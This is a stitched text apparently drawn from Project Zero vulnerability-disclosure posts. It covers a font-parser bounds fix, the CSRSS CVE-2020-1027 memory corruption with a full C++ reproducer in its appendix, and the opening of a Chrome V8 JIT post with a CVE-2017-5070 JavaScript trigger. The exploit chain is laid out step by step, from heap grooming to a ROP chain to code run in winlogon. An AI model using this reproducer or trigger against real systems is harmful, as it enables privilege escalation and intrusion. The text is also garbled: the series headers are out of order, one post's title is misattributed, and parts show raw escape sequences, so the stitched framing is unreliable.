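static int read_fixed(BlendReader *r, Fixed16_16 *out) {
    char *end;
    double d = strtod(r->p, &end);
    if (end == r->p) return 0;
    r->p = end;
    *out = (Fixed16_16)(d * 65536.0);
    return 1;
}

/* Reads "[ n n ... ]" into values[master]; a 16th element is rejected. */
static int read_open_fixed_array(BlendReader *r, int master) {
    int n = 0;
    skip_ws(r);
    if (*r->p != '[') return ERR_SYNTAX;
    r->p++;
    for (;;) {
        skip_ws(r);
        if (*r->p == ']') { r->p++; return n; }
        if (n >= MAX_AXES) return ERR_LIMIT;
        if (!read_fixed(r, &r->values[master][n])) return ERR_SYNTAX;
        n++;
    }
}

/* The patched loop shape: the bound is checked after seeing the next '['
 * and before the read, so the 17th inner array never touches values[16].
 * Returns the number of masters, or a negative status. */
int parse_blend_design_positions(BlendReader *r, const char *text) {
    memset(r, 0, sizeof *r);
    r->p = text;
    skip_ws(r);
    if (*r->p != '[') return ERR_SYNTAX;
    r->p++;
    for (;;) {
        skip_ws(r);
        if (*r->p == ']') { r->p++; break; }
        if (*r->p != '[') return ERR_SYNTAX;
        if (r->num_masters >= MAX_MASTERS) return ERR_LIMIT;  /* the added bound */
        int got = read_open_fixed_array(r, r->num_masters);
        if (got < 0) return got;
        r->num_axes = got;
        r->num_masters++;
    }
    return r->num_masters;
}

/* Builds "[[][]...[]]" with n empty inner arrays (constructed test input,
 * the same shape the crash font uses to shift the index). */
int build_empty_masters(char *buf, size_t cap, int n) {
    if (cap < (size_t)(2 * n + 3)) return 0;
    size_t k = 0;
    buf[k++] = '[';
    for (int i = 0; i < n; i++) { buf[k++] = '['; buf[k++] = ']'; }
    buf[k++] = ']';
    buf[k] = '\0';
    return 1;
}

/* Convenience wrappers so results can be checked without a reader object. */
int masters_in(const char *text) {
    BlendReader r;
    return parse_blend_design_positions(&r, text);
}
int empty_masters_result(int n) {
    char b[128];
    BlendReader r;
    return build_empty_masters(b, sizeof b, n) ? parse_blend_design_positions(&r, b) : ERR_SYNTAX;
}
Fixed16_16 value_at(const char *text, int m, int a) {
    BlendReader r;
    parse_blend_design_positions(&r, text);
    return r.values[m][a];
}

int main(void) {
    printf("3 masters:  %d\n", masters_in("[[0 0.5 1][1 0 0][0.25 0.25 0.25]]"));
    printf("22 masters: %d\n", empty_masters_result(22));
    return 0;
}
```

With the bound in place the 22-array input from the crash font is answered with -4 before the loop reaches values[16]; without the `num_masters >= MAX_MASTERS` line the loop would keep writing into whatever follows the array on the stack, which is exactly the primitive the post describes.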
In the ParseBlendVToHOrigin function, both the ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

```c
int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[16];
  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {
    return -4;
  }

  [...]
}
```

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

```c
int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    if (num_master >= 16) {
      return -4;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }

  [...]
}
```

## 2. CSRSS issue on Windows 10 (CVE-2020-1027)

### Background

The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can't lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer.
It invokes a selected CSRSS routine and (optionally) receives the result:

```c
NTSTATUS CsrClientCallServer(
    PCSR_API_MSG ApiMessage,
    PVOID CaptureBuffer,
    ULONG ApiNumber,
    LONG DataLength);
```

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to [this series of posts](<https://j00ru.vexillium.org/2010/07/windows-csrss-write-up-the-basics/>) for a detailed description of the CSRSS internals.

One of the CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies.
An example of an application manifest is provided below:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"
      version="1.0.0.0" processorArchitecture="x86"/>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"
          version="2.5.0.0" processorArchitecture="x86"/>
    </dependentAssembly>
  </dependency>
</assembly>
```

### The bug

The vulnerability in question was discovered in the routine sxssrv!BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path.
UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

```c
typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
```

BaseSrvSxsCreateActivationContext starts with validating the string parameters:

```c
for (i = 0; i < 6; ++i) {
  if (StringField = StringFields[i]) {
    Length = StringField->Length;
    if (Length && !StringField->Buffer ||
        Length > StringField->MaximumLength || Length & 1)
      return 0xC000000D;
    if (StringField->Buffer) {
      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,
                                    Length + 2, 1)) {
        DbgPrintEx(0x33, 0,
                   "SXS: Validation of message buffer 0x%lx failed.\n"
                   " Message:%p\n"
                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",
                   i, ApiMessage, StringField, StringField->Length,
                   StringField->MaximumLength, StringField->Buffer);
        return 0xC000000D;
      }
      CharCount = StringField->Length >> 1;
      if (StringField->Buffer[CharCount] &&
          StringField->Buffer[CharCount - 1])
        return 0xC000000D;
    }
  }
}
```

CsrValidateMessageBuffer is declared as follows:

```c
BOOLEAN CsrValidateMessageBuffer(
    PCSR_API_MSG ApiMessage,
    PVOID* Buffer,
    ULONG ElementCount,
    ULONG ElementSize);
```

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn't cause an integer overflow, and 3) it doesn't go past the end of the capture buffer.

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we'll be calling it ApplicationName) can also be re-used as an output parameter.
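To make the gap between the two length fields concrete, here is an added C model, written for this post and not CSRSS code: it implements the three checks the post attributes to CsrValidateMessageBuffer over a constructed capture region, applies them once sized by Length (the pre-patch check above) and once sized by MaximumLength (what an output parameter needs), and also shows the clamping approach the post describes under "The fix", where an oversized MaximumLength is shrunk to Length + 2 instead of failing the call. The region layout, the UnicodeString/CaptureBuffer types and every function name here are this example's own simplifications, not ntdll or csrsrv APIs; the 0x300 region size and the 0x8000 MaximumLength are the values used by the post's reproducer.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not CSRSS code: struct and function names are this
 * example's own (hypothetical) simplifications. */
typedef struct {
    uint16_t Length;         /* bytes in use */
    uint16_t MaximumLength;  /* bytes a writer may assume are available */
    uint16_t *Buffer;        /* UTF-16 data inside the capture region */
} UnicodeString;

typedef struct {
    uint8_t *base;  /* start of the shared capture region */
    size_t size;    /* bytes in the region */
} CaptureBuffer;

/* 1) pointer inside the region, 2) count*size does not overflow,
 * 3) the span ends inside the region. */
bool validate_message_buffer(const CaptureBuffer *cb, const void *ptr,
                             size_t element_count, size_t element_size) {
    uintptr_t base = (uintptr_t)cb->base, start = (uintptr_t)ptr;
    if (start < base || start >= base + cb->size) return false;
    if (element_size && element_count > SIZE_MAX / element_size) return false;
    size_t bytes = element_count * element_size;
    size_t offset = (size_t)(start - base);
    return bytes <= cb->size - offset;   /* cannot overflow: offset < size */
}

/* The pre-patch check: the validated span is Length + 2 bytes. Adequate
 * only for a string the server reads and never writes back into. */
bool validate_as_input(const CaptureBuffer *cb, const UnicodeString *s) {
    if (s->Length & 1) return false;
    if (s->Length > s->MaximumLength) return false;
    if (s->Length && !s->Buffer) return false;
    if (!s->Buffer) return true;
    return validate_message_buffer(cb, s->Buffer, s->Length + 2u, 1);
}

/* What an output parameter needs: the whole MaximumLength capacity a
 * later memcpy may fill must also lie inside the region. */
bool validate_as_output(const CaptureBuffer *cb, const UnicodeString *s) {
    if (!validate_as_input(cb, s)) return false;
    if (!s->Buffer || s->MaximumLength == 0) return true;
    return validate_message_buffer(cb, s->Buffer, s->MaximumLength, 1);
}

/* The patch's approach as the post describes it: instead of failing the
 * call, shrink the usable capacity to the validated Length + 2 bytes. */
uint16_t clamped_capacity(const CaptureBuffer *cb, const UnicodeString *s) {
    if (s->MaximumLength &&
        !validate_message_buffer(cb, s->Buffer, s->MaximumLength, 1))
        return (uint16_t)(s->Length + 2);
    return s->MaximumLength;
}

typedef struct { bool input_ok; bool output_ok; uint16_t capacity; } Verdict;

/* Constructed scenario: a 0x300-byte region holding a 6-character string
 * 0x20 bytes before its end, with MaximumLength chosen by the caller. */
Verdict check_string(uint16_t maximum_length) {
    static uint8_t region[0x300];
    CaptureBuffer cb = { region, sizeof region };
    UnicodeString s;
    const char *ascii = "Module";
    s.Buffer = (uint16_t *)(region + sizeof region - 0x20);
    for (size_t i = 0; i <= strlen(ascii); i++) s.Buffer[i] = (uint16_t)ascii[i];
    s.Length = (uint16_t)(strlen(ascii) * 2);   /* 12 bytes, terminator excluded */
    s.MaximumLength = maximum_length;
    Verdict v = { validate_as_input(&cb, &s), validate_as_output(&cb, &s),
                  clamped_capacity(&cb, &s) };
    return v;
}

int main(void) {
    Verdict honest = check_string(14), inflated = check_string(0x8000);
    printf("MaximumLength 14:     input %d output %d capacity %u\n",
           honest.input_ok, honest.output_ok, honest.capacity);
    printf("MaximumLength 0x8000: input %d output %d capacity %u\n",
           inflated.input_ok, inflated.output_ok, inflated.capacity);
    return 0;
}
```

The inflated string passes the Length-based check exactly as in the real bug (12 + 2 bytes do sit inside the region), fails the MaximumLength-based one, and is clamped back to 14 usable bytes, so any later copy bounded by the clamped capacity stays inside the validated span.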
The affected call stack looks as follows:

```text
sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity
sxs!CNodeFactory::CreateNode
sxs!XMLParser::Run
sxs!SxspIncorporateAssembly
sxs!SxspCloseManifestGraph
sxs!SxsGenerateActivationContext
sxssrv!BaseSrvSxsCreateActivationContextFromStructEx
sxssrv!BaseSrvSxsCreateActivationContext
```

When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName's buffer and the unaudited MaximumLength value as the buffer size:

```c
BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;
if (BufferCapacity) {
  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;
  GenActCtxParams.ApplicationNameBuffer =
      CreateCtxParams->ApplicationName.Buffer;
} else {
  GenActCtxParams.ApplicationNameCapacity = 60;
  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);
  if (!StringBuffer) {
    Status = 0xC0000017;
    goto error;
  }
  GenActCtxParams.ApplicationNameBuffer = StringBuffer;
}
```

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

```cpp
Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);
if (Context) {
  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);
} else {
  FusionpTraceAllocFailure(v14);
  SetLastError(0xE);
  goto error;
}
if (GenActCtxParams->ApplicationNameBuffer &&
    GenActCtxParams->ApplicationNameCapacity) {
  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;
  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;
}
```

Ultimately, sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy in a way that can go past the end of the capture buffer:

```cpp
IdentityNameBuffer = 0;
IdentityNameLength = 0;
SetLastError(0);
if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,
                                           &IdentityNameBuffer,
                                           &IdentityNameLength)) {
  CallSiteInfo = off_16506FA20;
  goto error;
}
if (IdentityNameLength &&
    IdentityNameLength < Context->ApplicationNameCapacity) {
  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,
         2 * IdentityNameLength + 2);
  Context->ApplicationNameLength = IdentityNameLength;
} else {
  *Context->ApplicationNameBuffer = 0;
  Context->ApplicationNameLength = 0;
}
```

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.

### Exploitation

Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there's one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it's quite difficult to reliably make a "useful" allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

 * Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process.
This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

 * csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the "local" and "remote" addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft's Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit CFG's inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB". The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

```c
typedef struct _LDR_MODULE {
  LIST_ENTRY     InLoadOrderModuleList;
  LIST_ENTRY     InMemoryOrderModuleList;
  LIST_ENTRY     InInitializationOrderModuleList;
  PVOID          BaseAddress;
  PVOID          EntryPoint;
  ULONG          SizeOfImage;
  UNICODE_STRING FullDllName;
  UNICODE_STRING BaseDllName;
  ULONG          Flags;
  SHORT          LoadCount;
  SHORT          TlsIndex;
  LIST_ENTRY     HashTableEntry;
  ULONG          TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;
```

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by CFG, so the exploit can't jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it's important to restore PEB_LDR_DATA's original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: it overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.

### The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19.
The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

```c
ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;
if (ApplicationName.MaximumLength &&
    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,
                              ApplicationName.MaximumLength, 1)) {
  SavedMaximumLength = ApplicationName.MaximumLength;
  ApplicationName.MaximumLength = ApplicationName.Length + 2;
}

[...]

if (SavedMaximumLength)
  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =
      SavedMaximumLength;
return result;
```

### Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

```cpp
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>

#include <string>

const char* MANIFEST_CONTENTS =
    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"
    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"
    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "
    "processorArchitecture='amd64'/>"
    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";

const WCHAR* MANIFEST_NAME =
    L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"
    L"d761caeca23d64a2.manifest";
const WCHAR* PATH = L"\\\\.\\c:Windows\\";
const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,
                                                      ULONG BufferSize);
f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,
                                                    PVOID CaptureBuffer,
                                                    ULONG ApiNumber,
                                                    ULONG DataLength);
f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,
                                                        PCSTR String,
                                                        ULONG Length,
                                                        ULONG MaximumLength,
                                                        PSTR OutputString);
f_CsrCaptureMessageString CsrCaptureMessageString;

// Places a UTF-16 string in the capture buffer; Length is in characters.
NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,
                              PCWSTR String, ULONG Length = 0) {
  if (Length == 0) {
    Length = lstrlenW(String);
  }
  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,
                                 Length * 2 + 2, OutputString);
}

int main() {
  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");
  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(
      Ntdll, "CsrAllocateCaptureBuffer");
  CsrClientCallServer =
      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");
  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(
      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];
  memset(Message, 0, 0x220);

  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;
  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.
  // The offsets and values are taken directly from the exploit.
  *(uint32_t*)(Message + 0x40) = 0xc1;
  *(uint16_t*)(Message + 0x44) = 9;
  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;
  // therefore, it doesn't have to be stored in the capture buffer.
  *(const char**)(Message + 0x80) = Manifest.c_str();
  *(uint64_t*)(Message + 0x88) = Manifest.size();
  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);
  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);
  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);
  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.
  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);
}
```

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).

In-the-Wild Series: Windows Exploits (Project Zero, published 2021-01-12; CVE-2020-0938, CVE-2020-1020, CVE-2020-1027)

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild.
To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).

Posted by Sergei Glazunov, Project Zero

### Introduction

As we continue the series on the watering hole attack discovered in early 2020, in this post we'll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.

[Timeline chart of the extracted exploits and affected Chrome versions](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEMUw-YTpTvkjcUeKpLYcW6LPJUa4iJZkrxyjjB5LI7D9A_mLEY5hH6E8YQkEiCfTiigo_L00kGyOkIHJHS6rEsx-p5cRRHhvKtPWMhw4b1f9y0d6RE2sIQWvZAo_k8LpUvoF1VZePHcIQoTWaxeGC82ORwHQbMWIifLTvN0NYUu7XYdTKe5ndTIq9/s1359/timeline.png>)

All vulnerabilities used by the attacker are in V8, Chrome's JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still [exploited in real-world attacks](<https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/>) against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.

The bugs themselves aren't novel.
In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker\u2019s exploit development process.\n\n### 1\\. CVE-2017-5070\n\n#### The vulnerability\n\nThis is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:\n\nglobal_array = [, 1.1];\n\nfunction trigger(local_array) {\n\nvar temp = global_array[0];\n\nlocal_array[1] = {};\n\nreturn global_array[1];\n\n}\n\ntrigger([, {}]);\n\ntrigger([, 1.1]);\n\nfor (var i = 0; i < 10000; i++) {\n\ntrigger([, {}]);\n\n}\n\nprint(trigger(global_array)); \n \n--- \n \nThe first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the \u201cshape\u201d of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. 
Since the compiler incorrectly assumes that local_array and global_array can\u2019t point to the same object, it doesn\u2019t invalidate the recorded map state of global_array and, consequently, eliminates the \u201credundant\u201d map check in the last line of the function.\n\nThe vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.\n\nThe issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=722756>) by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8.git/+/e33fd30777f99a0d6e16b16d096a2663b1031457>) made the alias analyzer use the constant comparison only when both arguments are constants:\n\nHAliasing Query(HValue* a, HValue* b) {\n\n[...]\n\n// Constant objects can be distinguished statically.\n\n- if (a->IsConstant()) {\n\n+ if (a->IsConstant() && b->IsConstant()) {\n\nreturn a->Equals(b) ? kMustAlias : kNoAlias;\n\n}\n\nreturn kMayAlias; \n \n--- \n \n#### Exploit 1\n\nThe earliest exploit we\u2019ve discovered targets Chrome 37-58. This is the widest version range we\u2019ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.\n\nThe author of the exploit takes a [known approach](<http://phrack.org/papers/attacking_javascript_engines.html>) to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It \u201cconstructs\u201d a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. 
Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can\u2019t be modified. Instead, it\u2019s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.\n\nThe exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.\n\nThe author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren\u2019t moved by the garbage collector. And, of course, the exploit runs inside a web worker.\n\nHowever, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it\u2019s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.\n\n#### Exploit 2\n\nThe second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit\u2019s supported version range, and the exploit server always gives preference to the second exploit. 
The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.\n\nThe general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it\u2019s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.\n\nWhile it\u2019s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public [proof-of-concept](<https://chromium.googlesource.com/v8/v8/+/e33fd30777f99a0d6e16b16d096a2663b1031457/test/mjsunit/regress/regress-crbug-722756.js>).\n\n### 2\\. CVE-2020-6418\n\n#### The vulnerability\n\nThis is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. 
